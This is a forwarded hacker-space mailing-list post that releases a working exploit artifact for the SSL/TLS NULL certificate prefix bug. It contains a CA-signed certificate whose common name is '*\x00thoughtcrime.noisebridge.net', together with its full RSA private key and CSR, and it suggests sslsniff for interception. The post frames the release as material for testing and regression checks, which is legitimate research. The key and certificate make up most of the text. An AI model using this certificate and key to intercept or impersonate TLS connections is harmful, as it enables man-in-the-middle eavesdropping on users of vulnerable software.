Hello *, In the spirit of giving and sharing, I felt it would be nice to enable other Noisebridgers (and friends of Noisebridge) to play around with bugs in SSL/TLS. Moxie was just over and we'd discussed releasing this certificate for some time. He's already released a few certificates and I thought I'd join him. In celebration of his visit to San Francisco, I wanted to release fun-times-at-moxie-marlinspike-high. This is a text file that contains a fully valid, signed certificate (with private key) that can be used to exploit the NULL certificate prefix bug[0]. The certificate is valid for * on the internet (when exploiting libnss software). The certificate is good for two years. It won't work for exploiting the bug for software written with the WIN32 api, they don't accept (for good reason) *! I suggest the use of Moxie's sslsniff[1] if you're so inclined to try network related testing. It may also be useful for testing code signing software. It's been long enough that everyone should be patched for this awesome class of bugs. This certificate and corresponding private key should help people test fairly obscure software or software they've written themselves. I hope this release will help with confirmation of the bug and with regression testing. Feel free to use this certificate for anything relating to free software too. Consider it released into the public domain of interesting integers. Enjoy! Best, Jacob [0] http://thoughtcrime.org/papers/null-prefix-attacks.pdf [1] http://thoughtcrime.org/software/sslsniff/ Private-Key: (1024 bit) modulus: 00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc: 5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44: c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3: 6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02: 72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd: 29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f: bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c: 93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05: ce:f0:82:33:d8:76:06:4c:9f publicExponent: 65537 (0x10001) privateExponent: 00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff: 3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09: 6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc: 51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11: c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76: 06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a: 35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2: 28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c: 57:2c:78:a9:42:b2:49:d8:71 prime1: 00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4: 0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce: 2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84: 96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4: e6:3a:40:99:03 prime2: 00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b: 17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93: e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba: c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23: 49:79:53:35:35 exponent1: 15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15: 66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d: 8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9: 88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89: 77:eb:0d:c1 exponent2: 5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73: be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26: 78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9: 85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62: 2d:92:6e:ed coefficient: 00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a: 8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e: a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1: 12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3: e6:c2:29:86:17 Certificate Request: Data: Version: 0 (0x0) Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc: 5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44: c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3: 6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02: 72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd: 29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f: bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c: 93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05: ce:f0:82:33:d8:76:06:4c:9f Exponent: 65537 (0x10001) Attributes: a0:00 Signature Algorithm: md5WithRSAEncryption 64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30: c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4: a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14: 0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1: d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de: 70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9: f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20: a2:dc -----BEGIN RSA PRIVATE KEY----- MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR 5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX 19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4 IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE REQUEST----- MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/ 4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog otw= -----END CERTIFICATE REQUEST----- -----BEGIN CERTIFICATE----- MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3 DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91 Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ 82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2 TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2 ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3 dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ== -----END CERTIFICATE----- ----- End forwarded message ----- -- Eugen* Leitl <a href="http://leitl.org">leitl</a> http://leitl.org ______________________________________________________________ ICBM: 48.07100, 11.36820 http://www.ativel.com http://postbiota.org 8B29F6BE: 099D 78BA 2FD3 B014 B08A 7779 75B0 2443 8B29 F6BE